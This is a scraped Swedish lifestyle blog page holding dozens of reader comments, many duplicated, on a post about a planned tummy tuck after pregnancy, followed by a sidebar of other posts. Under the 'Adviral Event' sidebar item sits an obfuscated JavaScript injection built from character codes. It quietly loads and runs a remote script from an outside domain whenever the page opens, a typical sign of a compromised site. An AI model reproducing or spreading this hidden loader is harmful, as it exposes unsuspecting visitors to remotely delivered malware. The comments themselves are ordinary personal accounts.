 45. Jag har levt med psoriasis sedan 6 årsålder och fått ledsjukdomen psoriasisartrit. Tränat mycket innan och lever med värk. Tyckte det var lite tramsigt i tonåren när nån klagade över nån finne.. Kan ej få barn då jag tar cellgifter pga sjukdomen. Jag tycker du får göra som du vill, du är vuxen och det är din kropp! Lycka till!

 46. tack, för att du delar med dig. Efter två födslar känner jag igen mig mycket i det du skriver och självbilden av min egen mage. Lycka till med operationen

 47. Ett bra beslut kan jag tycka! Finns ingen anledning att gå och må dåligt över saker man kan fixa till! Har en väninna som gjort denna operation för många år sedan och hon fick en jätte fin mage! Så Lycka Till ropar Jag o Kalle ifrån Spanien! Kramar!

 48. Jag har levt med psoriasis sedan 6 årsålder och fått ledsjukdomen psoriasisartrit. Tränat mycket innan och lever med värk. Tyckte det var lite tramsigt i tonåren när nån klagade över nån finne.. Kan ej få barn då jag tar cellgifter pga sjukdomen. Jag tycker du får göra som du vill, du är vuxen och det är din kropp! Lycka till!

 49. TACK My! För att du visar upp din mage. Jag följde ”Ensam Mamma” och jag hade aldrig trott att din mage ser ut som min, ALDRIG! Nu har jag inte så mycket till delning men hängmage det har jag. Spelar ingen roll vad jag sätter på mig, det syns. Gick upp 25 kg med mitt första barn, 24 år. Tack för att du delar med dig till oss! Jag har själv tänkt på en bukoperation, får se om det bli av efter nästa barn! /Amanda

 50. TACK My! För att du visar upp din mage. Jag följde ”Ensam Mamma” och jag hade aldrig trott att din mage ser ut som min, ALDRIG! Nu har jag inte så mycket till delning men hängmage det har jag. Spelar ingen roll vad jag sätter på mig, det syns. Gick upp 25 kg med mitt första barn, 24 år. Tack för att du delar med dig till oss! Jag har själv tänkt på en bukoperation, får se om det bli av efter nästa barn! /Amanda

 51. TACK My för att du går ut med ett sånt här inlägg DET är en förebild för många andra till skillnad mot många bloggar som retucherar sina bilder och gör sig smalare och uppmanar till dieter och överdriven träning.
  Jag slår vad om att du inte är ensam om detta!
  Faktum är att det finns ett till problem folk inte pratar högt om efter en graviditet och det är hur man ser ut ”down there”. Det är många kvinnor som lider i det tysta vad gäller det också efter att man bivit klippt, ihopsydd osv.
  Du är grymt stark tjejen!
  Kramar och lyckatill

 52. TACK My för att du går ut med ett sånt här inlägg DET är en förebild för många andra till skillnad mot många bloggar som retucherar sina bilder och gör sig smalare och uppmanar till dieter och överdriven träning.
  Jag slår vad om att du inte är ensam om detta!
  Faktum är att det finns ett till problem folk inte pratar högt om efter en graviditet och det är hur man ser ut ”down there”. Det är många kvinnor som lider i det tysta vad gäller det också efter att man bivit klippt, ihopsydd osv.

  Du är grymt stark tjejen!

  Kramar och lyckatill

 53. Vackra vackra My, Som någon annan skrev här förstår jag verkligen att du och Maggan har blivit vänner, ni är riktiga människor båda två, ni är roliga generösa, ärliga och så klart fruktansvärt vackra.
  Ja magen är väl lite tråkig att dras med så helt rätt av dig att göra något åt det då det tynger dig. Skulle du ångra dig så är den ju dock nu visad och jag kan inte föreställa mig att någon skulle tycka sämre om dig för att du har en vad som rent estetiskt just nu kan betecknas som en ”ful” mage. Det är ju mest trams.
  Att må bra och vara nöjd själv är ju dock så klart viktigt. Du är beundransvärd! All lycka till i detta och tack för din superfina blogg!

 54. Vackra vackra My, Som någon annan skrev här förstår jag verkligen att du och Maggan har blivit vänner, ni är riktiga människor båda två, ni är roliga generösa, ärliga och så klart fruktansvärt vackra.

  Ja magen är väl lite tråkig att dras med så helt rätt av dig att göra något åt det då det tynger dig. Skulle du ångra dig så är den ju dock nu visad och jag kan inte föreställa mig att någon skulle tycka sämre om dig för att du har en vad som rent estetiskt just nu kan betecknas som en ”ful” mage. Det är ju mest trams.

  Att må bra och vara nöjd själv är ju dock så klart viktigt. Du är beundransvärd! All lycka till i detta och tack för din superfina blogg!

 55. Har inte fött några barn så förstår dig inte, mer än att jag hade gjort samma sak. Men jag hade hängpattar som 20 åring. Åkte till citadell kliniken och doktor Cosmo (som också tvinga mig att sluta röka) och gjorde en bröstlyft. Bästa beslut jag tagit även om det var djävulskt dyrt.
  Folk idag operarar sig till höger och vänster framförallt tuttar. Varför ska man behöva be om ursäkt för att man operarar magen. Din kropp ditt beslut. Du behöver inte förklara dig. Lycka till

 56. Hej My. UNDERBART med din ärliga text!
  Med första barnet hände inget märkvärdigt alls med min mage. Men med andra barnet var SF-måttet 48 i vecka 37. Medelsnittsmåttet är 34! Viktuppgång nånstans mellan 35-40 kg, en bebis på 5.270 gram och 57 lång. När jag vet att jag inte ska ha fler, så kommer jag försöka få landstinget att betala en bukoperation. Min mage ser hemsk ut, värre än din. Kul när man är 30 år ? Jag skulle önska att du berättade om du har planer för fler barn, eftersom vad jag förstått så är det då meningslöst med en operation? Men även resan efter operation, har hört att det är ett rejält ingrepp. Fick du ditt via landstinget? Vissa kommuner är tydligen hårdare än andra.

 57. Har inte fött några barn så förstår dig inte, mer än att jag hade gjort samma sak. Men jag hade hängpattar som 20 åring. Åkte till citadell kliniken och doktor Cosmo (som också tvinga mig att sluta röka) och gjorde en bröstlyft. Bästa beslut jag tagit även om det var djävulskt dyrt.

  Folk idag operarar sig till höger och vänster framförallt tuttar. Varför ska man behöva be om ursäkt för att man operarar magen. Din kropp ditt beslut. Du behöver inte förklara dig. Lycka till

 58. Hej My. UNDERBART med din ärliga text!

  Med första barnet hände inget märkvärdigt alls med min mage. Men med andra barnet var SF-måttet 48 i vecka 37. Medelsnittsmåttet är 34! Viktuppgång nånstans mellan 35-40 kg, en bebis på 5.270 gram och 57 lång. När jag vet att jag inte ska ha fler, så kommer jag försöka få landstinget att betala en bukoperation. Min mage ser hemsk ut, värre än din. Kul när man är 30 år 🙁 Jag skulle önska att du berättade om du har planer för fler barn, eftersom vad jag förstått så är det då meningslöst med en operation? Men även resan efter operation, har hört att det är ett rejält ingrepp. Fick du ditt via landstinget? Vissa kommuner är tydligen hårdare än andra.

 59. Jag tycker att du gör rätt! Tror precis som du skriver att många har gjort ingreppet men få står för det! Ser alla kändismammor som ploppar ut barn efter barn och sedan talar de ut om sina dieter och hur de har tränat sig till tight mage… Bullshit!!! Jag var smal, ca 48 kg när jag blev gradvis med första barnet 25 år gammal! efteråt blev magen ganska ok, inga bristningar! 5 år senare gradvid med tvillingar! Inga bristningar men överflödig hud och en magmuskel som delat på sig ser jag konstant ut som gravid i 5 månaden! För att inte tala om hur jag ser ut efter att ha ätit gott, helt klart som i 7 månaden! Inget roligt att få frågan när 4-e barnet kommer…. Jag har lärt mig att alltid gå med att dra in magen! Alltid ha klänningar med skärning under bysten! Har funderat på att förstora brösten för att få bättre proportioner…. Men även varit på konsultation för bukplastik… Men bangade…. Kanske om jag följer med på din resa så vågar jag ta mod till mig!!!! Lycka till med din op!!!!!

 60. Jag tycker att du gör rätt! Tror precis som du skriver att många har gjort ingreppet men få står för det! Ser alla kändismammor som ploppar ut barn efter barn och sedan talar de ut om sina dieter och hur de har tränat sig till tight mage… Bullshit!!! Jag var smal, ca 48 kg när jag blev gradvis med första barnet 25 år gammal! efteråt blev magen ganska ok, inga bristningar! 5 år senare gradvid med tvillingar! Inga bristningar men överflödig hud och en magmuskel som delat på sig ser jag konstant ut som gravid i 5 månaden! För att inte tala om hur jag ser ut efter att ha ätit gott, helt klart som i 7 månaden! Inget roligt att få frågan när 4-e barnet kommer…. Jag har lärt mig att alltid gå med att dra in magen! Alltid ha klänningar med skärning under bysten! Har funderat på att förstora brösten för att få bättre proportioner…. Men även varit på konsultation för bukplastik… Men bangade…. Kanske om jag följer med på din resa så vågar jag ta mod till mig!!!! Lycka till med din op!!!!!

 61. Du bestämmer över din kropp, själv så har jag inga bristningar efter 3 barn men en fläskmage som jag vill bli av med. vad kostar en bukoperation på ett ungefär? nån som vet

 62. Du bestämmer över din kropp, själv så har jag inga bristningar efter 3 barn men en fläskmage som jag vill bli av med. vad kostar en bukoperation på ett ungefär? nån som vet

 63. Efter fyra barn där den äldsta är 5 1/2 år och den yngsta är 1 år så har jag helt klart fått en mage jag hatar. Tack för att du delar med dig, man tror ju typ att man är den enda i världen som lider av detta problem. Om jag bara hade råd så skulle jag definitivt fixa till magen också. Är bara 24 år och tanken på att behöva leva med den magen måååånga år till är oerhört jobbig. Har som du testat med det mesta, och träningen ger effekt på andra ställen på kroppen men inte på magen.
  Kommer såklart följa din resa här på bloggen ?

 64. Efter fyra barn där den äldsta är 5 1/2 år och den yngsta är 1 år så har jag helt klart fått en mage jag hatar. Tack för att du delar med dig, man tror ju typ att man är den enda i världen som lider av detta problem. Om jag bara hade råd så skulle jag definitivt fixa till magen också. Är bara 24 år och tanken på att behöva leva med den magen måååånga år till är oerhört jobbig. Har som du testat med det mesta, och träningen ger effekt på andra ställen på kroppen men inte på magen.
  Kommer såklart följa din resa här på bloggen 🙂

 65. Fick också bristningar (fattar inte att alla kompisar har klarat sig?) På babysimmet såg alla ut som att de hade haft nån surrogat till sina barn då de var helt ”oförstörda”. Nu är jag stolt att jag tog mig dit trots bristningar och 10 kg övervikt. Kanske vågar nån mer nu?. Ska bära mina bristningar med stolthet i sommar. Det är mina tatueringar ? klarade mig dock från större muskeldelning och tränar den lilla jag har med hjälp av Olga. Kram och lycka till med op!

 66. Fick också bristningar (fattar inte att alla kompisar har klarat sig?) På babysimmet såg alla ut som att de hade haft nån surrogat till sina barn då de var helt ”oförstörda”. Nu är jag stolt att jag tog mig dit trots bristningar och 10 kg övervikt. Kanske vågar nån mer nu?. Ska bära mina bristningar med stolthet i sommar. Det är mina tatueringar 🙂 klarade mig dock från större muskeldelning och tränar den lilla jag har med hjälp av Olga. Kram och lycka till med op!

 67. Hej!
  Jag ser ut precis som du. Jag födde tvillingar i jan förra året. Jag tycker du ska köra på!
  Jag vill op men en sak stoppar mig.
  Hur förklarar jag för mina två döttrar att mamma inte dög i hennes ögon?
  Lycka till!

 68. Hej!
  Jag ser ut precis som du. Jag födde tvillingar i jan förra året. Jag tycker du ska köra på!

  Jag vill op men en sak stoppar mig.
  Hur förklarar jag för mina två döttrar att mamma inte dög i hennes ögon?
  Lycka till!

 69. du är fantastiskt modig som går ut och berättar och framförallt VISAR detta så tydligt.
  jag har själv två barn, en kille som blir 9 i år och en som blir 6.
  efter mitt första barn kom jag snabbt i form igen och dessutom i ÄNNU bättre form än jag varit i innan graviditeten. efter mitt andra barn var det inte riktigt lika lätt… (och då är jag ändå inte ”gammal”, vilket ju kan försvåra det lite också. är 32 idag).
  dessutom hade jag fått bristningar på magen.
  något jag inte fått alls under min första graviditet.
  gick upp ca 10-15 kg båda graviditeterna så det var ingen enorm viktökning heller.
  har i alla fall mått SÅ dåligt över min ”randiga” mage de senaste 6 åren och därmed också struntat i ”allt annat”. har låtit mig själv gå upp i vikt (har väl kanske 6-7 kilos ”övervikt” idag tills jag är bekväm i mig själv igen – alltså inga mängder här heller, men tillräckligt för att jag inte ska trivas i min egen kropp) vilket bara gjort att jag mått ännu sämre.
  har aldrig badat på stranden eller badhuset med mina barn. och då hör det till saken att jag egentligen ÄLSKAR att bada. men NU har jag bestämt mig. vi har bokat en resa till Rhodos i juni. då SKA jag må bättre i mig själv. och jag SKA bada med mina barn på vår resa. till en början har jag lagt om kosten och börjat träna. ska successivt öka på detta och när jag väl kommit till min ”målvikt” hoppas jag att min mage har hängt med så pass bra att jag känner mig ok med den, trots att ränderna kanske inte helt och hållet försvinner.
  annars är jag inte alls främmande för att genomföra en bukplastik jag heller.
  jag har dock ingen magmuskeldelning (vad jag vet!?) så det är väl mest skinnet jag vill bli av med i så fall.
  vill med min historia bara berätta att du verkligen inte är ensam.
  och jag vill skicka en stor kram och ett stort tack för att vi får följa med dig på denna resa. jag håller alla mina tummar för att operationen kommer gå som planerat och att du blir nöjd med resultatet.
  kram

 70. du är fantastiskt modig som går ut och berättar och framförallt VISAR detta så tydligt.
  jag har själv två barn, en kille som blir 9 i år och en som blir 6.
  efter mitt första barn kom jag snabbt i form igen och dessutom i ÄNNU bättre form än jag varit i innan graviditeten. efter mitt andra barn var det inte riktigt lika lätt… (och då är jag ändå inte ”gammal”, vilket ju kan försvåra det lite också. är 32 idag).
  dessutom hade jag fått bristningar på magen.
  något jag inte fått alls under min första graviditet.
  gick upp ca 10-15 kg båda graviditeterna så det var ingen enorm viktökning heller.
  har i alla fall mått SÅ dåligt över min ”randiga” mage de senaste 6 åren och därmed också struntat i ”allt annat”. har låtit mig själv gå upp i vikt (har väl kanske 6-7 kilos ”övervikt” idag tills jag är bekväm i mig själv igen – alltså inga mängder här heller, men tillräckligt för att jag inte ska trivas i min egen kropp) vilket bara gjort att jag mått ännu sämre.
  har aldrig badat på stranden eller badhuset med mina barn. och då hör det till saken att jag egentligen ÄLSKAR att bada. men NU har jag bestämt mig. vi har bokat en resa till Rhodos i juni. då SKA jag må bättre i mig själv. och jag SKA bada med mina barn på vår resa. till en början har jag lagt om kosten och börjat träna. ska successivt öka på detta och när jag väl kommit till min ”målvikt” hoppas jag att min mage har hängt med så pass bra att jag känner mig ok med den, trots att ränderna kanske inte helt och hållet försvinner.
  annars är jag inte alls främmande för att genomföra en bukplastik jag heller.
  jag har dock ingen magmuskeldelning (vad jag vet!?) så det är väl mest skinnet jag vill bli av med i så fall.
  vill med min historia bara berätta att du verkligen inte är ensam.
  och jag vill skicka en stor kram och ett stort tack för att vi får följa med dig på denna resa. jag håller alla mina tummar för att operationen kommer gå som planerat och att du blir nöjd med resultatet.
  kram

 71. Hej
  Härligt att det finns en operation att göra för din mage. Själv har jag en jätte jobbig hudsjukdom som inte går att göra något åt jag går alltid med full mundering på ! Förstår din känsla att inte kunna vara sig själv i alla lägen.

 72. Hej
  Härligt att det finns en operation att göra för din mage. Själv har jag en jätte jobbig hudsjukdom som inte går att göra något åt jag går alltid med full mundering på ! Förstår din känsla att inte kunna vara sig själv i alla lägen.

 73. Hej!
  Tack för att du vågar prata om detta. Gick igenom samma ingrepp som du ska göra för 6 mån sen. Det går verkligen inte att förstå hur ens livskvalite höjs efter detta, äntligen slippa dölja och skämmas! Jag blir fortfarande glad så fort jag ser min mage i spegeln:), att få känna mig normal. Du kommer inte ångra dig, men förbered dig på att de tre första veckorna är väldigt jobbiga efter op. Sen blir det oftast snabbt bättre.
  Lycka till och kram!!

 74. Vilket fint och modigt inlägg! Det berör så många punkter hur det är att vara kvinna/mamma idag. Tycker det är fint att du vågar stå för att du ska göra en op och att det är ditt beslut. Lycka till!

 75. Hej!
  Tack för att du vågar prata om detta. Gick igenom samma ingrepp som du ska göra för 6 mån sen. Det går verkligen inte att förstå hur ens livskvalite höjs efter detta, äntligen slippa dölja och skämmas! Jag blir fortfarande glad så fort jag ser min mage i spegeln:), att få känna mig normal. Du kommer inte ångra dig, men förbered dig på att de tre första veckorna är väldigt jobbiga efter op. Sen blir det oftast snabbt bättre.
  Lycka till och kram!!

 76. Vilket fint och modigt inlägg! Det berör så många punkter hur det är att vara kvinna/mamma idag. Tycker det är fint att du vågar stå för att du ska göra en op och att det är ditt beslut. Lycka till!

 77. Tack för detta inlägget! Känner verkligen igen mig. 30 år med 2 små töser. Gick inte upp så mycket under graviditeterna och alla säger åh vad du e smal, vilken fin kropp du har, syns ju inte alls att du varit gravid…min ända tanke är: tur du inte ser mig utan kläder för från midjan och upp till halsen ser jag ut som en 70-årig tant

  • Hmmm halva mitt inlägg kom inte med? Provar igen. Tack för detta inlägget! Känner verkligen igen mig. 30 år med 2 små töser. Gick inte upp så mycket under graviditeterna och alla säger åh vad du e smal, vilken fin kropp du har, syns ju inte alls att du varit gravid…min ända tanke är: tur du inte ser mig utan kläder för från midjan och upp till halsen ser jag ut som en 70-årig tant

 78. Tack för detta inlägget! Känner verkligen igen mig. 30 år med 2 små töser. Gick inte upp så mycket under graviditeterna och alla säger åh vad du e smal, vilken fin kropp du har, syns ju inte alls att du varit gravid…min ända tanke är: tur du inte ser mig utan kläder för från midjan och upp till halsen ser jag ut som en 70-årig tant

  • Hmmm halva mitt inlägg kom inte med? Provar igen. Tack för detta inlägget! Känner verkligen igen mig. 30 år med 2 små töser. Gick inte upp så mycket under graviditeterna och alla säger åh vad du e smal, vilken fin kropp du har, syns ju inte alls att du varit gravid…min ända tanke är: tur du inte ser mig utan kläder för från midjan och upp till halsen ser jag ut som en 70-årig tant

 79. Hej My!
  Tycker att du gör absolut rätt i att operera dig om det är det du vill!
  Själv har jag varit förskonad från bristningar på magen efter två barn, men kan ändå förstå vad du lider över det.
  Jag slutade röka den 6 januari 2015 och vill bara säga att du inte ska bli förvånad om du känner ett visst mått av oengagemang och depression av att sluta röka. Förstår nu att det är det många som gör och även att man kan gå upp i vikt första tiden, även om man INTE äter mer eller sämre mat. Men dom (som vet) säger att det ska styra upp sig självt efter ett tag, och det är det hoppet jag lever på:-)
  Lycka till med både rökningen och operationen!

 80. Modig att du delar med dig! Jag känner verkligen igen mig. Jag har två barn men det var redan vid den första graviditeten som min mage blev förstörd. Trots att jag ”bara” gick upp ca 16 kg.
  Precis som du så har jag jättekomplex över det här och det begränsar verkligen mitt liv. Jag vill tex inte bada bland människor jag känner. Jag får ångest bara av tanken! Känns som att jag är den enda med ”tantmage”.
  Jag har också tränat massor och haft en PT men utan att få ordning på magen. Har funderat massor på bukplastik och även varit på konsultation. Det som håller mig tillbaka är rädslan för komplikationer vid operationen och tanken att tänk om jag vill ha fler barn.
  Det känns skönt att se att man inte är ensam trots allt!
  Stort lycka till och tusen tack för att du delar med dig!

 81. Hej My!
  Tycker att du gör absolut rätt i att operera dig om det är det du vill!
  Själv har jag varit förskonad från bristningar på magen efter två barn, men kan ändå förstå vad du lider över det.
  Jag slutade röka den 6 januari 2015 och vill bara säga att du inte ska bli förvånad om du känner ett visst mått av oengagemang och depression av att sluta röka. Förstår nu att det är det många som gör och även att man kan gå upp i vikt första tiden, även om man INTE äter mer eller sämre mat. Men dom (som vet) säger att det ska styra upp sig självt efter ett tag, och det är det hoppet jag lever på:-)
  Lycka till med både rökningen och operationen!

 82. Modig att du delar med dig! Jag känner verkligen igen mig. Jag har två barn men det var redan vid den första graviditeten som min mage blev förstörd. Trots att jag ”bara” gick upp ca 16 kg.
  Precis som du så har jag jättekomplex över det här och det begränsar verkligen mitt liv. Jag vill tex inte bada bland människor jag känner. Jag får ångest bara av tanken! Känns som att jag är den enda med ”tantmage”.
  Jag har också tränat massor och haft en PT men utan att få ordning på magen. Har funderat massor på bukplastik och även varit på konsultation. Det som håller mig tillbaka är rädslan för komplikationer vid operationen och tanken att tänk om jag vill ha fler barn.
  Det känns skönt att se att man inte är ensam trots allt!
  Stort lycka till och tusen tack för att du delar med dig!

 83. Hej! Tycker det är modigt att du går ut med det. Att ha en delning gör ju samtidigt att inälvorna inte är skyddade så det är ju en risk att gå omkring så och även riskera att få ont i ryggen. Jag skulle gärna göra en sådan op om jag hade chansen. Har du haft mkt besvär med din delning och isåfall vad? Kul att få höra hur läkningsprocessen går till. Ta hand om dig!

 84. Hej! Tycker det är modigt att du går ut med det. Att ha en delning gör ju samtidigt att inälvorna inte är skyddade så det är ju en risk att gå omkring så och även riskera att få ont i ryggen. Jag skulle gärna göra en sådan op om jag hade chansen. Har du haft mkt besvär med din delning och isåfall vad? Kul att få höra hur läkningsprocessen går till. Ta hand om dig!

 85. Tycker du är super modig som visar upp din mage, jag gömde min i kroppsstrumpor innan jag gjorde min operation.
  Jag gjorde en bukplastik i april 2012 och det är ett av dom bästa besluten jag gjort.
  Jag gick upp 30kg i mina 2 graviditeter.
  Genom att göra operationen, ta bort hud och sy ihop magmusklerna har jag hittat mig själv igen.
  Nu är det roligt att träna och forma kroppen till något jag aldrig skulle kunnat fixa utan att sätta kniven i skinnet.
  Lycka till!!

 86. Tycker du är super modig som visar upp din mage, jag gömde min i kroppsstrumpor innan jag gjorde min operation.
  Jag gjorde en bukplastik i april 2012 och det är ett av dom bästa besluten jag gjort.
  Jag gick upp 30kg i mina 2 graviditeter.
  Genom att göra operationen, ta bort hud och sy ihop magmusklerna har jag hittat mig själv igen.
  Nu är det roligt att träna och forma kroppen till något jag aldrig skulle kunnat fixa utan att sätta kniven i skinnet.
  Lycka till!!

 87. Jag fick mitt första barn 1/12-2014. Jag hade under graviditeten gått upp totalt 20kg varav 12kg kom efter v.30. Jag var så svullen i benen från lite ovan knäna och ner. Fötterna var fruktansvärda och det gick inte att få på några skor mot slutet. Gympadojor med helt urdragna snören. Händerna var likadana och en del svullnad i ansiktet.
  Jag fick en dotter på 4660g och 55cm lång.
  Jag hade haft en del bristningar på magen sedan tidigare pga viktupågång/viktnedgång men under graviditeten kom det mycket mer. De blev längre och tätare. 2veckor efter att dottern kom så hade jag gått ner 15kg men magen ser förjävlig ut. Så länge man slipper se sig själv i sol ljus så går det att överleva men när jag ser mig själv i sol ljus det ut som något ur en skräckfilm. Magen ser helt upphackad ut av bristningar.
  Vet inte ens om en bukplastik skulle hjälpa på mig.
  Vi vill i alla fall ha ett barn till sen får vi se om det blir akutellt med någon op. Har aldrig varit bekväm i badkläder innan heller och blir knappast mer sugen att visa upp mig nu heller.
  Det finns bara ett ärr på magen som jag är stolt över, som betyder något och det är kejsarsnitts ärret då förlossningen fick avslutas i akut kejsarsnitt och det var där min lilla älskling fick plockas ut ifrån.

 88. Jag fick mitt första barn 1/12-2014. Jag hade under graviditeten gått upp totalt 20kg varav 12kg kom efter v.30. Jag var så svullen i benen från lite ovan knäna och ner. Fötterna var fruktansvärda och det gick inte att få på några skor mot slutet. Gympadojor med helt urdragna snören. Händerna var likadana och en del svullnad i ansiktet.
  Jag fick en dotter på 4660g och 55cm lång.
  Jag hade haft en del bristningar på magen sedan tidigare pga viktupågång/viktnedgång men under graviditeten kom det mycket mer. De blev längre och tätare. 2veckor efter att dottern kom så hade jag gått ner 15kg men magen ser förjävlig ut. Så länge man slipper se sig själv i sol ljus så går det att överleva men när jag ser mig själv i sol ljus det ut som något ur en skräckfilm. Magen ser helt upphackad ut av bristningar.
  Vet inte ens om en bukplastik skulle hjälpa på mig.

  Vi vill i alla fall ha ett barn till sen får vi se om det blir akutellt med någon op. Har aldrig varit bekväm i badkläder innan heller och blir knappast mer sugen att visa upp mig nu heller.
  Det finns bara ett ärr på magen som jag är stolt över, som betyder något och det är kejsarsnitts ärret då förlossningen fick avslutas i akut kejsarsnitt och det var där min lilla älskling fick plockas ut ifrån.

 89. Ska bli spännande att följa dig efter OP… Har börjat fundera på en själv.
  Jag själv har också en ”hemsk” mage efter 2 barn.. Båda födda m akutsnitt. så jag har ett ärr som skapar ett veck under magen. Inga bristningar men däremot ett navelbråck som gör att magmusklerna inte gått ihop igen.. Jag är normalviktig men har en putmage som får folk att tro att jag är gravid. Värst runt mens. Och med en ordentlig svank på det så ser det verkligen ut som en gravidmage… :-S
  När jag vaknar på morgonen ser det ok ut men efter att ha stått & gått en hel dag så putar allt ut. Magmusklerna håller lixom inte in tarmar mm
  Det är inte alls kul att inte kunna klä sig tight utan att alla frågar eller tittar.
  Är dock rädd för OP, mina akutsnitt va ångestfyllda och det är inget jag gör frivilligt igen ..
  Men risken finnas att det blir ett akut bråck i navel om jag inte åtgärdar det. Måste våga ta itu med det..
  Du är modig. Lycka till!

 90. Ska bli spännande att följa dig efter OP… Har börjat fundera på en själv.

  Jag själv har också en ”hemsk” mage efter 2 barn.. Båda födda m akutsnitt. så jag har ett ärr som skapar ett veck under magen. Inga bristningar men däremot ett navelbråck som gör att magmusklerna inte gått ihop igen.. Jag är normalviktig men har en putmage som får folk att tro att jag är gravid. Värst runt mens. Och med en ordentlig svank på det så ser det verkligen ut som en gravidmage… :-S
  När jag vaknar på morgonen ser det ok ut men efter att ha stått & gått en hel dag så putar allt ut. Magmusklerna håller lixom inte in tarmar mm
  Det är inte alls kul att inte kunna klä sig tight utan att alla frågar eller tittar.

  Är dock rädd för OP, mina akutsnitt va ångestfyllda och det är inget jag gör frivilligt igen ..

  Men risken finnas att det blir ett akut bråck i navel om jag inte åtgärdar det. Måste våga ta itu med det..

  Du är modig. Lycka till!

 91. […] Jag tror mig veta att My är en kvinna som älskar sig själv, som bryr sig om sig själv och hon gör inte detta för att få bra självförtroende eller självkänsla, hon gör detta för att det är något som inte ska finnas där, som kan rättas till och som stör henne psykiskt och fysiskt. Varför inte göra något kirurgiskt åt det? Heja dig My, för att du vågat stå för det i sitt inlägg. […]

 92. […] Jag tror mig veta att My är en kvinna som älskar sig själv, som bryr sig om sig själv och hon gör inte detta för att få bra självförtroende eller självkänsla, hon gör detta för att det är något som inte ska finnas där, som kan rättas till och som stör henne psykiskt och fysiskt. Varför inte göra något kirurgiskt åt det? Heja dig My, för att du vågat stå för det i sitt inlägg. […]

 93. Hej! Hittade precis din blogg och en massa intressant läsning. Jag kom hem från Citadellkliniken i förmiddags efter min bukplastik. ÄNTLIGEN är den gjord. Har drömt och funderat i 4 år på att göra detta.
  Känner mig som om jag är överkörd av ett godståg förstås… Men det får det vara värt! ?

  • Hej Camilla! -välkommen hit! Vad roligt, grattis till beslutet! du kommer inte att ångra dig… jag känner igen känslan av att känna sig som överkörd av ett tåg! Men jag lovar det blir bättre… Sov mycket i början och följ läkarens rekommendationer =) Jag har sen en tid tillbaka kommit igång med träningen, det är en lång resa men värt det till 100%. Krya på dig! kramar <3

 94. Hej! Hittade precis din blogg och en massa intressant läsning. Jag kom hem från Citadellkliniken i förmiddags efter min bukplastik. ÄNTLIGEN är den gjord. Har drömt och funderat i 4 år på att göra detta.
  Känner mig som om jag är överkörd av ett godståg förstås… Men det får det vara värt! 🙂

  • Hej Camilla! -välkommen hit! Vad roligt, grattis till beslutet! du kommer inte att ångra dig… jag känner igen känslan av att känna sig som överkörd av ett tåg! Men jag lovar det blir bättre… Sov mycket i början och följ läkarens rekommendationer =) Jag har sen en tid tillbaka kommit igång med träningen, det är en lång resa men värt det till 100%. Krya på dig! kramar <3

 95. Hej My.
  Råkade trilla över ditt inlägg om op av magen.
  Min ser precis ut som din gjorde. Samma problem med magmusklerna.
  Har tänkt att det är så här jag får leva eftersom jag inte har råd att bekosta någon op hos plastikkirurg.
  Har du fått din via landstinget?
  I vilken ände började du då? Vårdcentralen?
  Jag vill verkligen bli av med den där ”påsen” som hänger på min mage!
  Mycket starkt av dig att visa upp magen!!

 96. Hej My.
  Råkade trilla över ditt inlägg om op av magen.
  Min ser precis ut som din gjorde. Samma problem med magmusklerna.
  Har tänkt att det är så här jag får leva eftersom jag inte har råd att bekosta någon op hos plastikkirurg.
  Har du fått din via landstinget?
  I vilken ände började du då? Vårdcentralen?
  Jag vill verkligen bli av med den där ”påsen” som hänger på min mage!
  Mycket starkt av dig att visa upp magen!!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/